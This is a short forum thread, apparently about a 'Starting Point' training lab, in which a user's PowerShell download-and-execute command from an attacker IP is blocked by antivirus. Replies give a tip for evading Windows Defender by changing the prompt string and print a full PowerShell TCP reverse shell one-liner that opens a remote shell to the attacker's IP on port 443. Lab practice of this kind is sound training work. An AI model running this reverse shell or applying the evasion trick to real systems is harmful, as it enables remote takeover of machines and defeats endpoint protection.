Starting Point

This script contains malicious content and has been blocked by your antivirus software.

At line:1 char:1

  • IEX (New-Object Net.WebClient).DownloadString("http:// ip /she …

  • 
      + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException   
    
      + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand   
    
    
    

I throw this error when loading the shell on the sql server, someone also came out and solved it already?

Hello,
I had the issue because I was using a powershell from github (copy/paste failed into my VM…) And the solution was on commentsl:
if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with “#”
source: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub

However, the script provided on the tutorial does contain the # so you may check that part on your reverse shell

Regards

The official tutorial contains a typo. There is "# " and it has to be “#” without a space

$client=New-ObjectSystem.Net.Sockets.TCPClient("<Your_IP>",443);$stream=$client.GetStream();[byte[]]$bytes=0…65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne0){;$data=(New-Object-TypeNameSystem.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex$data2>&1|Out-String);$sendback2=$sendback+"#";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()